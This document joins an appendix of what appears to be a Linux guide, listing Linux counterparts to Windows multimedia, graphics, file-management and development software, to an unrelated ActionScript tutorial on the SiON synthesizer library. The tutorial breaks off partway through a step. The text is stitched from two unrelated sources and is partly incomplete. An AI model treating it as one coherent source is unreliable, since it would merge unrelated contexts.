Audio CD Player | CD Player, Winamp, Windows Media Player | KsCD, Grip, Helix Banshee
CD Burner | Nero, Roxio Easy CD Creator | K3b
CD Ripper | WMPlayer | kaudiocreator, Sound Juicer, Helix Banshee
Audio Player | Winamp, Windows Media Player, iTunes | amaroK, XMMS, Rhythmbox, Helix Banshee
Video Player | Winamp, Windows Media Player, RealPlayer | Kaffeine, MPlayer, Xine, XMMS, Totem
Audio Editor | SoundForge, Cooledit, Audacity | Audacity
Sound Mixer | sndvol32 | alsamixer, Kmix
Music Notation | Finale, SmartScore, Sibelius | LilyPond, MusE, Noteedit, Rosegarden
Video Creator and Editor | Windows Movie Maker, Adobe Premiere, Media Studio Pro, MainActor | MainActor, Kino
TV Viewer | AVerTV, PowerVCR 3.0, CinePlayer DVR | xawtv (analog), motv (analog), xawtv4, tvtime, kdetv, zapping, Kaffeine
amaroK
The amaroK media player handles various audio formats and plays the streaming audio broadcasts of radio stations on the Internet. The program handles all file types supported by the sound server acting as a back-end (currently aRts or GStreamer). Find more information about amaroK at amarok.kde.org.

Audacity
Audacity is a powerful, free sound editing tool. Record, edit, and play any Ogg Vorbis or WAV file. Mix tracks, apply effects to them, and export the results to WAV or Ogg Vorbis. Find more information about Audacity at audacity.sourceforge.net.

Grip
Grip provides CD player functionality for the GNOME desktop. It supports CDDB lookups for track and album data. Find more information on the project's Web site.

Helix Banshee
Helix Banshee is a music management and playback application for the GNOME desktop. With Helix Banshee, import CDs, sync your music collection to an iPod, play music directly from an iPod, create playlists with songs from your library, and create audio and MP3 CDs from subsets of your library. For more information, refer to the GNOME User Guide.

Kaffeine
Kaffeine is a versatile multimedia application supporting a wide range of audio and video formats, including Ogg Vorbis, WMV, MOV, and AVI. Import and edit playlists of various types, create screen shots, and save media streams to your local hard disk. Find more information about Kaffeine at kaffeine.sourceforge.net.

KAudioCreator
KAudioCreator is a lean CD ripper application. If configured accordingly, KAudioCreator also generates playlist files for your selection that can be used by players like amaroK, XMMS, or Helix Banshee. Read more about using KAudioCreator in the KDE User Guide.

kdetv
kdetv is a TV viewer and recorder application for the KDE desktop supporting analog TV. Find more information about kdetv on the project's Web site.

KsCD
KsCD is a neat little CD player application for the KDE desktop. Its user interface very much resembles that of a normal hardware CD player, guaranteeing ease of use. KsCD supports CDDB, enabling you to get any track and album information from the Internet or your local file system. Find more information at docs.kde.org/en/3.3/kdemultimedia/kscd.

K3b
K3b is a multitalented media creation tool. Create data, audio, or video CD and DVD projects by dragging and dropping. Find more information about K3b on the project's Web site. You can also refer to our K3b chapter.

LilyPond
LilyPond is a free music sheet editor. Because the input format is text-based, you can use any text editor to create note sheets. Users do not need to tackle any formatting or notation issues, like spacing, line-breaking, or polyphonic collisions. All these issues are automatically resolved by LilyPond. It supports many special notations, like chord names and tablatures. The output can be exported to PNG, TeX, PDF, PostScript, and MIDI. Find more information about LilyPond at lilypond.org.

MainActor
MainActor is a fully fledged video authoring software. Because there is a Windows version of MainActor, transition from Windows is easy. Find more information about MainActor on the project's Web site.

MPlayer
MPlayer is a movie player that runs on several systems. Find more information about MPlayer on the project's Web site.

MusE
MusE's goal is to be a complete multitrack virtual studio for Linux. Find more information about MusE on the project's Web site.

Noteedit
Noteedit is a powerful score editor for Linux. Use it to create sheets of notes and to export and import scores to and from many formats, such as MIDI, MusicXML, and LilyPond. Find more information about Noteedit at developer.berlios.de/projects/noteedit.

Rhythmbox
Rhythmbox is a powerful, multitalented media player for the GNOME desktop. It allows you to organize and browse your music collection using playlists and even supports Internet radio. Find more information about Rhythmbox on the project's Web site.

Rosegarden
Rosegarden is a free music composition and editing environment. It features an audio and MIDI sequencer and a score editor. Find more information about Rosegarden at rosegardenmusic.com.

Sound Juicer
Sound Juicer is a lean CD ripper application for the GNOME desktop. Find more information about Sound Juicer on the project's Web site.

Totem
Totem is a movie player application for the GNOME desktop. It supports Shoutcast, m3u, asx, SMIL, and ra playlists, lets you use keyboard controls, and plays a wide range of audio and video formats. Find more information about Totem on the project's Web site.

tvtime
tvtime is a lean TV viewer application supporting analog TV. Find more information about tvtime, including a comprehensive usage guide, at tvtime.sourceforge.net.

xawtv and motv
xawtv is a TV viewer and recorder application supporting analog TV. motv is basically the same as xawtv, but with a slightly different user interface. Find more information about the xawtv project at linux.bytesex.org/xawtv.

xawtv4
xawtv4 is a successor of the xawtv application. It supports both analog and digital audio and video broadcasts. For more information, refer to linux.bytesex.org/xawtv.

Xine
Xine is a multimedia player that plays CDs, DVDs, and VCDs. It interprets many multimedia formats. For more information, refer to xinehq.de.

XMMS
XMMS is the traditional choice for multimedia playback. It is focused on music playback, offering support for CD playback and Ogg Vorbis files. Users of Winamp should find XMMS comfortable because of its similarity. Find more information about XMMS on the project's Web site.

zapping
Zapping is a TV viewer and recorder application for the GNOME desktop supporting analog TV. Find more information about Zapping at zapping.sourceforge.net.
A.4 Graphics
The following section presents some of the Linux software solutions for graphics work. These include simple drawing applications as well as fully-fledged image editing tools and powerful rendering and animation programs.
Table A-4 Graphics Software for Windows and Linux

Task | Windows Application | Linux Application
Simple Graphic Editing | MS Paint | KolourPaint
Professional Graphic Editing | Adobe Photoshop, Paint Shop Pro, Corel PhotoPaint, The GIMP | The GIMP, Krita
Creating Vector Graphics | Adobe Illustrator, CorelDraw, OpenOffice.org Draw, Freehand | OpenOffice.org Draw, Inkscape, Dia
SVG Editing | WebDraw, Freehand, Adobe Illustrator | Inkscape, Dia, Kivio
Creating 3D Graphics | 3D Studio MAX, Maya, POV-Ray, Blender | POV-Ray, Blender, KPovmodeler
Managing Digital Photographs | Software provided by the camera manufacturer | Digikam, f-spot
Scanning | Vuescan | Vuescan, The GIMP
Image Viewing | ACDSee | gwenview, gThumb, Eye of Gnome, f-spot
Blender
Blender is a powerful rendering and animation tool available on many platforms, including Windows, MacOS, and Linux. Find more information about Blender on the project's Web site.

Dia
Dia is a Linux application aiming to be the Linux equivalent of Visio. It supports many types of special diagrams, such as network or UML charts. Export formats include SVG, PNG, and EPS. To support your own custom diagram types, provide the new shapes in a special XML format. Find more information about Dia on the project's Web site.

Digikam
Digikam is a smart digital photo management tool for the KDE desktop. Importing and organizing your digital images is a matter of a few clicks. Create albums, add tags to spare you from copying images around different subdirectories, and eventually export your images to your own Web site. Find more information about Digikam on the project's Web site. You can also refer to our Digikam chapter in the KDE User Guide.

Eye of Gnome (eog)
Eye of Gnome is an image viewer application for the GNOME desktop. Find more information on the project's Web site.

f-spot
f-spot is a flexible digital photograph management tool for the GNOME desktop. It lets you create and manage albums and supports various export options, like HTML pages or burning of image archives to CD. You can also use it as an image viewer on the command line. Find more information about f-spot on the project's Web site. You can also refer to our chapter in the GNOME User Guide.

gThumb
gThumb is an image viewer, browser, and organizer for the GNOME desktop. It supports the import of your digital images via gphoto2, allows you to carry out basic transformations and modifications, and lets you tag your images to create albums matching certain categories. Find more information about gThumb at gthumb.sourceforge.net.

Gwenview
Gwenview is a simple image viewer for KDE. It features a folder tree window and a file list window that provide easy navigation of your file hierarchy. Find more information at gwenview.sourceforge.net.

Inkscape
Inkscape is a free SVG editor. Users of Adobe Illustrator, Corel Draw, and Visio can find a similar range of features and a familiar user interface in Inkscape. Among its features, find SVG-to-PNG export, layering, transforms, gradients, and grouping of objects. Find more information about Inkscape on the project's Web site.

Kivio
Kivio is a flow-charting application that integrates into the KOffice suite. Former users of Visio find a familiar look and feel in Kivio. Find more information about Kivio on the project's Web site.
KolourPaint
KolourPaint is an easy-to-use paint program for the KDE desktop. You can use it for tasks such as painting or drawing diagrams and editing screen shots, photos, and icons. For more information, refer to kolourpaint.sourceforge.net.

KPovmodeler
KPovmodeler is a POV-Ray front-end that integrates with the KDE desktop. KPovmodeler saves users from needing a detailed knowledge of POV-Ray scripting by translating the POV-Ray language into an easy-to-understand tree view. Native POV-Ray scripts can be imported to KPovmodeler as well. Find more information on the project's Web site.

Krita
Krita is KOffice's answer to Adobe Photoshop and The GIMP. It can be used for pixel-based image creation and editing. Its features include many of the advanced image editing capabilities you would normally expect with Adobe Photoshop or The GIMP. Find more information on the project's Web site.

OpenOffice.org Draw
See “OpenOffice.org” in Section A.1.

POV-Ray
The Persistence of Vision Raytracer creates three-dimensional, photo-realistic images using a rendering technique called ray tracing. Because there is a Windows version of POV-Ray, it does not take much for Windows users to switch to the Linux version of this application. Find more information about POV-Ray on the project's Web site.

The GIMP
The GIMP is the open source alternative to Adobe Photoshop. Its feature list rivals that of Photoshop, so it is well suited for professional image manipulation. There is even a Windows version of GIMP available. Find more information on the project's Web site. You can also refer to our GIMP chapter.

VueScan
VueScan is scanning software available for several platforms. You can install it parallel to your vendor's scanner software. It supports the scanner's special hardware, like batch scanning, autofocus, infrared channels for dust and scratch suppression, and multiscan to reduce scanner noise in the dark areas of slides. It features simple and accurate color correction from color negatives. Find out more on the project's Web site.
A.5 System and File Management
The following section provides an overview of Linux tools for system and file management. Get to know text and source code editors, backup solutions, and archiving tools.
Table A-5 System and File Management Software for Windows and Linux

Task | Windows Application | Linux Application
File Manager | Windows Explorer | Konqueror, Nautilus
Text Editor | NotePad, WordPad, (X)Emacs | kate, GEdit, (X)Emacs, vim
PDF Creator | Adobe Distiller | Scribus
PDF Viewer | Adobe Reader | Adobe Reader, Evince, KPDF, Xpdf
Text Recognition | Recognita, FineReader | GOCR
Command Line Pack Programs | zip, rar, arj, lha, etc. | zip, tar, gzip, bzip2, etc.
GUI Based Pack Programs | WinZip | Ark, File Roller
Hard Disk Partitioner | PowerQuest, Acronis, Partition Commander | YaST, GNU Parted
Backup Software | ntbackup, Veritas | KDar, taper, dump
Adobe Reader
Adobe Reader for Linux is the exact counterpart of the Windows and Mac versions of this application. The look and feel on Linux are the same as on other platforms. The other parts of the Adobe Acrobat suite have not been ported to Linux. Find more information on the Adobe Web site.

Ark
Ark is a GUI-based pack program for the KDE desktop. It supports common formats, such as zip, tar.gz, tar.bz2, lha, and rar. You can view, select, pack, and unpack single files within an archive. Due to Ark's integration with Konqueror, you can also trigger actions (such as unpacking an archive) from the context menu in the file manager, similar to WinZip.

dump
The dump package contains both dump and restore. dump examines files in a file system, determines which ones need to be backed up, and copies those files to a specified disk, tape, or other storage medium. The restore command performs the inverse function of dump: it can restore a full backup of a file system. Find more information at dump.sourceforge.net.

Evince
Evince is a document viewer for PDF and PostScript formats for the GNOME desktop. Find more information on the project's Web site.

File Roller
File Roller is a GUI-based pack program for the GNOME desktop. It provides features similar to Ark's. For more information, refer to fileroller.sourceforge.net.

GEdit
GEdit is the official text editor of the GNOME desktop. It provides features similar to Kate's. Find more information on the project's Web site.

GNU Parted
GNU Parted is a command line tool for creating, destroying, resizing, checking, and copying partitions and the file systems on them. If you need to create space for new operating systems, use this tool to reorganize disk usage and copy data between different hard disks. Find more information on the project's Web site.

GOCR
GOCR is an OCR (optical character recognition) tool. It converts scanned images of text into text files. Find more information at jocr.sourceforge.net.

gzip, tar, bzip2
There are plenty of packaging programs for reducing disk usage. In general, they differ only in their pack algorithm. Linux can also handle the packaging formats used on Windows. bzip2 is a bit more efficient than gzip, but needs more time, depending on the pack algorithm.

kate
Kate is part of the KDE suite. It has the ability to open several files at once, either locally or remotely. With syntax highlighting, project file creation, and external script execution, it is a perfect tool for a programmer. Find more information at kate.kde.org.

KDar
KDar stands for KDE disk archiver and is a hardware-independent backup solution. KDar uses catalogs (unlike tar), so it is possible to extract a single file without reading the whole archive, and it is also possible to create incremental backups. KDar can split an archive into multiple slices and trigger the burning of a data CD or DVD for each slice. Find more information about KDar at kdar.sourceforge.net.
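The efficiency difference between gzip and bzip2 noted above can be observed directly. The following sketch uses Python's standard gzip and bz2 modules, which implement the same DEFLATE and Burrows-Wheeler algorithms as the command line tools; the sample text is only illustrative.

```python
import bz2
import gzip

# Illustrative sample: repetitive text, as found in logs or documents.
data = ("SUSE Linux Enterprise Desktop 10 GNOME User Guide\n" * 2000).encode("utf-8")

gz = gzip.compress(data)  # same DEFLATE algorithm as the gzip command
bz = bz2.compress(data)   # same Burrows-Wheeler algorithm as the bzip2 command

print(f"original: {len(data)} bytes")
print(f"gzip:     {len(gz)} bytes")
print(f"bzip2:    {len(bz)} bytes")
```

Both tools shrink typical text considerably; on most inputs bzip2 produces the smaller result at the cost of more CPU time, matching the description above.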
Konqueror
Konqueror is the default file manager for the KDE desktop, which can also be used as a Web browser, document and image viewer, and CD ripper. Find more information about this multifunctional application on the project's Web site.

KPDF
KPDF is a PDF viewing application for the KDE desktop. Its features include searching the PDF and a full screen reading mode like in Adobe Reader. Find more information at kpdf.kde.org.
Getting to Know Linux Software 169
novdocx (ENU) 01 February 2006
Nautilus
Nautilus is the default file manager of the GNOME desktop. It can be used to create folders and documents, display and manage your files and folders, run scripts, write data to a CD, and open URI locations. For an introduction to using Nautilus as a file manager, see the GNOME User Guide. Find more information about Nautilus on the project's Web site.

taper
Taper is a backup and restore program that provides a friendly user interface to allow backup and restoration of files to and from a tape drive. Alternatively, files can be backed up to archive files. Recursively selected directories are supported. Find more information at taper.sourceforge.net.

vim
vim (vi improved) is a program similar to the text editor vi. Users may need time to adjust to vim, because it distinguishes between command mode and insert mode. The basic features are the same as in all text editors. vim offers some unique options, like macro recording, file format detection and conversion, and multiple buffers in a screen. Find more information on the project's Web site.

(X)Emacs
GNU Emacs and XEmacs are very professional editors. XEmacs is based on GNU Emacs. To quote the GNU Emacs Manual, “Emacs is the extensible, customizable, self-documenting real-time display editor.” Both offer nearly the same functionality, with minor differences. Used by experienced developers, they are highly extensible through the Emacs Lisp language. They support many languages, like Russian, Greek, Japanese, Chinese, and Korean. Find more information on the GNU and XEmacs Web sites.

Xpdf
Xpdf is a lean PDF viewing suite for Linux and Unix platforms. It includes a viewer application and some export plug-ins for PostScript or text formats. Find more information on the project's Web site.
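The backup-and-restore cycle that tools like dump, KDar, and taper perform on real file systems can be sketched in miniature with Python's standard tarfile module. The directory layout and file contents below are hypothetical; a real backup would of course target a tape drive or a separate disk.

```python
import os
import shutil
import tarfile
import tempfile

# Hypothetical layout: a small "home" tree to back up.
work = tempfile.mkdtemp()
home = os.path.join(work, "home")
os.makedirs(home)
with open(os.path.join(home, "notes.txt"), "w") as f:
    f.write("meeting at 10\n")

# Full backup: archive the whole tree into one compressed file.
archive = os.path.join(work, "backup.tar.gz")
with tarfile.open(archive, "w:gz") as tar:
    tar.add(home, arcname="home")

# Simulate data loss, then restore from the backup.
os.remove(os.path.join(home, "notes.txt"))
with tarfile.open(archive, "r:gz") as tar:
    tar.extractall(work)

with open(os.path.join(home, "notes.txt")) as f:
    print(f.read().strip())  # the restored file content
shutil.rmtree(work)
```

dump and KDar improve on this naive scheme with catalogs and incremental backups, so a single file can be restored without reading the whole archive.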
A.6 Software Development
This section introduces Linux IDEs, toolkits, development tools, and versioning systems for professional software development.
Table A-6 Development Software for Windows and Linux

Task                                  Windows Application                         Linux Application
Integrated Development Environments   Borland C++, Delphi, Visual Studio, .NET    KDevelop, Eric, Eclipse, MonoDevelop, Anjuta
Toolkits                              MFC, Qt, GTK+                               Qt, GTK+
Compilers                             Visual Studio                               GCC
Debugging Tools                       Visual Studio                               GDB, valgrind
GUI Design                            Visual Basic, Visual C++                    Glade, Qt Designer
Versioning Systems                    Clearcase, Perforce, SourceSafe             CVS, Subversion
Anjuta

Anjuta is an IDE for GNOME/GTK+ application development. It includes an editor with automated formatting, code completion, and highlighting. As well as GTK+, it supports Perl, Pascal, and Java development. A GDB-based debugger is also included. Find more information at anjuta.sourceforge.net.

CVS

CVS, the Concurrent Versions System, is one of the most important version control systems for open source. It is a front-end to the Revision Control System (RCS) included in the standard Linux distributions.

Eclipse

The Eclipse Platform is designed for building integrated development environments that can be extended with custom plug-ins. The base distribution also contains a full-featured Java development environment.

Eric

Eric is an IDE optimized for Python and Python-Qt development.

GCC

GCC is a compiler collection with front-ends for various programming languages. Check out a complete list of features and find extensive documentation at gcc.gnu.org.

GDB

GDB is a debugging tool for programs written in various programming languages.

Glade

Glade is a user interface builder for GTK+ and GNOME development. As well as GTK+ support, it offers support for C, C++, C#, Perl, Python, Java, and others. Find more information at glade.gnome.org.

GTK+
GTK+ is a multiplatform toolkit for creating graphical user interfaces. It is used for all GNOME applications, The GIMP, and several others. GTK+ has been designed to support a range of languages, not only C/C++. Originally it was written for GIMP, hence the name “GIMP Toolkit.”

KDevelop

KDevelop allows you to write programs for different languages (C/C++, Python, Perl, etc.). It includes a documentation browser, a source code editor with syntax highlighting, a GUI for the compiler, and much more.

MonoDevelop

The Mono Project is an open development initiative working to develop an open source Unix version of the .NET development platform. Its objective is to enable Unix developers to build and deploy cross-platform .NET applications. MonoDevelop complements the Mono development effort with an IDE.

Qt

Qt is a program library for developing applications with graphical user interfaces. It allows you to develop professional programs rapidly. The Qt library is available not only for Linux but for a number of Unix flavors, and even for Windows and Macintosh. Thus it is possible to write programs that can be easily ported to those platforms. Language bindings for Qt development are summarized at developer.kde.org/language-bindings.

Qt Designer

Qt Designer is a user interface and form builder for Qt and KDE development. It can be run as part of the KDevelop IDE or in stand-alone mode. Qt Designer can be run under Windows and even integrates into the Visual Studio development suite.

Subversion

Subversion does the same thing CVS does but has major enhancements, like moving, renaming, and attaching meta information to files and directories. The Subversion home page is subversion.tigris.org.
Valgrind

Valgrind is a suite of programs for debugging and profiling x86 applications. Find more information at valgrind.org.
In this tutorial I'll be showing you how to get started with SiON, an AS3 software synthesizer library which generates sound using only code.
Final Result Preview
In the end this is what we're going to obtain:
Click on the darker rectangular area to start or stop the balls' movement.
Getting Necessary Files
First you need to get the SiON library. You can download it either as a SWC file or as uncompressed ActionScript files. To do this go to SiON Downloads and select the desired download method.
After you've downloaded the source code add it to your global class path.
Notice that on this page you can also download the ASDoc documentation and older versions of the library.
In this tutorial we'll make use of the well known minimalcomps library, developed by Keith Peters; if you don't have it go ahead and grab it: minimalcomps.
Also add the minimalcomps library to your global class path and let's get started.
Note: As always I'll be using FlashDevelop throughout this tutorial. You can use whatever code editor you like although I recommend sticking with FlashDevelop.
Step 1: What is SiON?
The SiON library is a software synthesizer library built in ActionScript 3.0 that works in Flash Player 10 or higher.

With SiON you can generate dynamic sounds on the fly without loading any audio files. It also makes it very easy to synchronize sounds with display objects (e.g. an object hitting a wall, an explosion, and so on).

Of its many features, I'll show you the essentials of working with it: using MML (Music Macro Language) data to generate sound, using voice presets and effectors on playing sounds, setting the tempo (BPM), panning and changing volume, and finally syncing sounds with display objects.
Step 2: Setting up the Project
Let's start by creating a new project. Open your code editor and create a new ActionScript 3 project.
I've named my project SiON Tutorial. After this, open the document class (in my case, Main).
You should have something similar to this:
package {
    import flash.display.Sprite;

    [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)]
    public class Main extends Sprite {
        public function Main():void {
        }
    }
}
In FlashDevelop you would probably have an init() method called when the movie is added to the stage. Go ahead and modify the code so that it matches the listing above.

Leave this file open, and on to the next step.
Step 3: Basic Usage
To start using SiON and hearing sound we only need to create one object: SiONDriver. This class provides the driver for SiON's digital signal processor emulator; through it, all basic operations are available as properties (bpm, volume), methods (pause(), play(), stop(), fadeIn()) and events (bpm changes, stream start and stop).
Note: Only one instance of the SiONDriver class can be created at any given moment. Trying to create multiple instances will throw an error. To get the existing instance of the SiONDriver class you can use the SiONDriver.mutex static property.
In your document (Main) class, add a new private variable called _driver and instantiate it in the constructor.
package {
    import flash.display.Sprite;
    import org.si.sion.SiONDriver;

    [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)]
    public class Main extends Sprite {
        private var _driver:SiONDriver;

        public function Main():void {
            _driver = new SiONDriver();
        }
    }
}
In order to play a sound you need to call the play() method of the SiONDriver object and pass it an SiONData object or an MML string as an argument. For our example we'll use an MML string (an SiONData object is essentially a compiled MML string anyway).
_driver.play('l8 cdefgab<c');
Add this line of code to the class and run the project (Ctrl+Enter if using FlashDevelop). You should now hear eighth notes from C5 (Do in octave five) up to C6 (Do in octave six). But what does l8 cdefgab<c actually mean?
Step 4: Music Macro Language
Music Macro Language (or MML) is a music description language used for sequencing music. The following elements are basically in each MML implementation (including SiON):
Note: Letters from a to g correspond to musical pitches and play the corresponding note. So c, d, e, f, g, a, b would have the following equivalent on a stave:
To set the length of a note you simply append a whole number to it. Say you want a whole-note c: you would write c1. If you want an eighth-note c you write c8 (which is 8 times shorter than c1), and so on. If you don't append any number to a note, it uses the default length of 4 (a quarter).
Rest: This defines the pause between two notes. The macro for rest is r. When followed by a whole number it represents the length of the rest (example: r4 would mean a quarter rest).
Length: To specify the default length of several notes at once, use l followed by a whole number representing the length.
Example:
l1 cdf l16 cdf
Octave: The default octave of a note (which defines the note's pitch) is the fifth octave. You can change the octave in two ways:

- Using the o macro (followed by an integer from 0-9) in front of the note. For example, o7c plays the C note in the seventh octave.
- Using the octave increment > or decrement < macro in front of a note. For example, to play the C note in the fourth octave you would write <c (remember that the default octave is the fifth one).
Sharp and flat notes: To play a sharp note, append a + or # to the note (e.g. b+ or b#, both having the same result); to play a flat note, append a - (e.g. a-).
Loops: To play a loop, wrap the macros in square brackets (e.g. [cdb]3 translates into cdb cdb cdb). To specify how many times the loop should play, append an integer to it. If no number is specified, the loop plays twice.
That's the basic usage of MML. To read more on the subject you can visit the wiki page here. Also visit the MML reference manual for SiON for a complete documentation on MML for SiON.
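Putting the macros above together, here is a short annotated phrase, assuming an active SiONDriver instance named _driver as in the earlier steps. The melody itself is arbitrary — just an illustration of the syntax:

```actionscript
// o6     : switch to the sixth octave
// l8     : set the default note length to eighth notes
// c+     : C sharp; e- : E flat
// r4     : a quarter rest
// [...]2 : play the bracketed phrase twice
// <      : step down one octave (here from 6 to 5)
// c2     : half-note C
_driver.play("o6 l8 [c+ e- g r4]2 <c2");
```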
Note: For a large database of example MML songs you can visit the MMLTalks application. Click on a song title from the list to play it. To see the MML source of a song, click the rightmost button.
Step 5: SiONData
As mentioned, an SiONData object is essentially a compiled MML string. To compile an MML string into an SiONData object, use the compile() method of the SiONDriver class.
package {
    import flash.display.Sprite;
    import org.si.sion.SiONData;
    import org.si.sion.SiONDriver;

    [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)]
    public class Main extends Sprite {
        private var _driver:SiONDriver;
        private var _data:SiONData;

        public function Main():void {
            _driver = new SiONDriver();
            _data = _driver.compile('l8 cdefgab<c');
            _driver.play(_data);
        }
    }
}
As you can see, we first use the driver's compile() method to compile the MML string into an SiONData object, then call the play() method and pass the _data object as an argument. This has the same result as before, when a string was used.
Step 6: Playing Multiple Sounds
So everything looks fine when playing one sound at a time but what about playing multiple sounds? Modify the class to look like the code below and let's see what happens.
package {
    import com.bit101.components.PushButton;
    import flash.display.Sprite;
    import flash.events.Event;
    import org.si.sion.SiONData;
    import org.si.sion.SiONDriver;

    [SWF(width = 550, height = 300, backgroundColor = 0x1f1f1f, frameRate = 30)]
    public class Main extends Sprite {
        private var _driver:SiONDriver;
        private var _s1:SiONData, _s2:SiONData;

        public function Main():void {
            _driver = new SiONDriver();
            _s1 = _driver.compile('l8 cdefgab<c');
            _s2 = _driver.compile('l8 o6c o5bagfedc');
            addSoundButtons();
        }

        private function addSoundButtons():void {
            var b1:PushButton = new PushButton(this, 10, 10, "Play sound 1", onPlaySound);
            var b2:PushButton = new PushButton(this, b1.x + b1.width + 5, 10, "Play sound 2", onPlaySound);

            function onPlaySound(e:Event):void {
                if (e.target == b1) _driver.play(_s1);
                if (e.target == b2) _driver.play(_s2);
            }
        }
    }
}
Run the code and click one of the two buttons that appear (Play sound 1 or Play sound 2). The first button plays the notes C5 to C6 and the second plays the reverse of the first sound. If you click one button and then the other before the first sound finishes, the first sound is stopped and the second one is played.
If you want to play both sounds independently you need to use the sequenceOn() method of the SiONDriver class.
Note: Some methods (like sequenceOn()) will work only after the play() method of the SiONDriver object has been called. If you try to call these methods before that, an error will be thrown.
To enable our code to play both sounds at the same time, first call the play() method in the constructor just before the addSoundButtons() call.
_driver.play();
addSoundButtons();
Now that the driver is active we can safely modify the onPlaySound() function like so:
function onPlaySound(e:Event):void {
    if (e.target == b1) _driver.sequenceOn(_s1);
    if (e.target == b2) _driver.sequenceOn(_s2);
}
If you run the code now and push both buttons you will be able to hear the two sounds playing at the same time. In a real case scenario you would use more complex sounds, of course, but these are just fine to understand how it works.
Step 7: Stopping Sequences
The example above works just fine, but there's one glitch: if you push a button repeatedly, the same sound will start playing multiple times. This might work for you, but what if you want to play it only once? In a real-world scenario you might need to stop a sound before it has finished.
For this you can use the sequenceOff() method of the driver class. This method requires a track ID identifying the track you want to stop, so we'll need to set that track ID when a sound is played using sequenceOn().
Update the onPlaySound() function as follows (note the sequenceOff() calls and the track IDs passed to sequenceOn()):
function onPlaySound(e:Event):void {
    if (e.target == b1) {
        _driver.sequenceOff(1);
        _driver.sequenceOn(_s1, null, 0, 0, 1, 1);
    }
    if (e.target == b2) {
        _driver.sequenceOff(2);
        _driver.sequenceOn(_s2, null, 0, 0, 1, 2);
    }
}
As you might have noticed, we set a track ID for each sequence (the sixth parameter) so that we can reference it later using the sequenceOff() method to stop it.
Step 8: Voices
Think of "voices" as different instruments. As you have noticed, the default sound played in SiON is a bit plain, and you may want to hear the sound of a piano instead.
Lucky for us the SiON library comes with some preset voices (462 voices in the current version to be precise).
All these voice presets are contained in the SiONPresetVoice class and are sorted into 15 categories.

Accessing these voices or categories is very simple. First you need an instance of the SiONPresetVoice class; then you can access a voice by its key or by its number within a category, and a category by its key or by its number.

The following example demonstrates how to access a voice or category in different ways.
The following example demonstrates how to access a voice or category in different ways.
var presets:SiONPresetVoice = new SiONPresetVoice(); // Instance of SiONPresetVoice

// Accessing a voice by key
var voiceByKey:SiONVoice = presets["valsound.brass2"]; // Returns the valsound.brass2 voice from the valsound.brass category

// Accessing a category by key
var categoryByKey:Array = presets["valsound.wind"]; // Returns the valsound.wind category

// Accessing a voice by number
var voiceByNo:SiONVoice = categoryByKey[3]; // Returns the 4th voice (valsound.wind4) in the valsound.wind category

// Accessing a category by number
var categoryByNo:Array = presets.categolies[3]; // Returns the valsound.brass category
(Yes,
categolies with an L; that's not a typo.)
Step 9: Voice Selector
Now we're going to create a new class which will help us to view categories and voices in each category.
First create a new class in your project named VoiceSelector that extends the Sprite class.
package {
    import com.bit101.components.ComboBox;
    import flash.display.Sprite;
    import org.si.sion.utils.SiONPresetVoice;

    public class VoiceSelector extends Sprite {
        private var _presets:SiONPresetVoice;
        private var _categories:ComboBox;
        private var _voices:ComboBox;

        public function VoiceSelector() {
            _presets = new SiONPresetVoice();
            _categories = new ComboBox(this, 0, 0, "Select a category");
            _voices = new ComboBox(this, _categories.width + _categories.x + 5, 0, "Select a voice");
        }
    }
}
In here we need a reference to an SiONPresetVoice object, so we add a new variable called _presets and instantiate it in the constructor.

We also need two combo boxes: one for the categories and one for the voices. We'll use the ComboBox component from the minimalcomps library.
Step 10: VoiceSelector Categories and Voices
Now that we have our UI placed, we first need to populate the categories list. For this we'll write a method called populateCategories(), so go ahead and add it to the class.
private function populateCategories():void {
    for each (var cat:Array in _presets.categolies)
        _categories.addItem(cat.name);
}
It's also necessary to call this method from the constructor of the class, so add it on the last line of the constructor. We also need an event listener to update the voices list when a category is selected.
package {
    import com.bit101.components.ComboBox;
    import flash.display.Sprite;
    import flash.events.Event;
    import org.si.sion.utils.SiONPresetVoice;

    public class VoiceSelector extends Sprite {
        private var _presets:SiONPresetVoice;
        private var _categories:ComboBox;
        private var _voices:ComboBox;

        public function VoiceSelector() {
            _presets = new SiONPresetVoice();
            _categories = new ComboBox(this, 0, 0, "Select a category");
            _categories.width = 120;
            _voices = new ComboBox(this, _categories.width + _categories.x + 5, 0, "Select a voice");
            _voices.width = 120;
            populateCategories();
            _categories.addEventListener(Event.SELECT, populateVoices);
        }

        private function populateCategories():void {
            for each (var cat:Array in _presets.categolies)
                _categories.addItem(cat.name);
        }

        private function populateVoices(e:Event = null):void {
            _voices.removeAll();
            _voices.selectedIndex = 0;
            var voices:Array = _presets[_categories.selectedItem];
            for (var i:int = 0; i < voices.length; i++)
                _voices.addItem(voices[i].name);
        }
    }
}
As you can see, in the populateCategories() method we use a for-each loop to get each available category.

In the populateVoices() method we first remove all items from the voices list, get the array corresponding to the selected category, and add its items to the voices list.

The last thing we need to complete our voice selector is a getter that returns the selected voice.
public function get voice():SiONVoice {
    if (_categories.selectedItem)
        return _presets[_categories.selectedItem][_voices.selectedIndex];
    else
        return null;
}
Step 11: Using the Selector
OK, so we have the voice selector ready. Go back to the main class and add a new private property called _selector of type VoiceSelector.
private var _selector:VoiceSelector;
Now we're going to add a method called addSelector() in which we instantiate the VoiceSelector object and add it to the stage.
private function addSelector():void {
    _selector = new VoiceSelector();
    _selector.x = 220;
    _selector.y = 10;
    addChild(_selector);
}
Also call this method from within the constructor, just after the addSoundButtons() call.
public function Main():void {
    _driver = new SiONDriver();
    _s1 = _driver.compile('l8 cdefgab<c');
    _s2 = _driver.compile('l8 o6co5bagfedc');
    _driver.play();
    addSoundButtons();
    addSelector();
}
Step 12: Playing Sounds with Selected Voice
In Step 6 we played some notes using the default voice. Now we want to play the same notes using the voice selected in the voice selector.

To do this, simply modify the onPlaySound() function like so:
function onPlaySound(e:Event):void {
    if (e.target == b1) {
        _driver.sequenceOff(1);
        _driver.sequenceOn(_s1, _selector.voice, 0, 0, 1, 1);
    }
    if (e.target == b2) {
        _driver.sequenceOff(2);
        _driver.sequenceOn(_s2, _selector.voice, 0, 0, 1, 2);
    }
}
When playing a sequence, the second parameter of the sequenceOn() method is the voice used for the sound data.

Run the code and play around with different voices to hear how each sounds (click the Play sound 1 or Play sound 2 button to play one of the two sounds).
Step 13: Sound Objects
Another way to get more control over playing sounds in SiON is using SoundObjects. The SoundObject class is the base class for all objects that can play sounds by operating the SiONDriver.

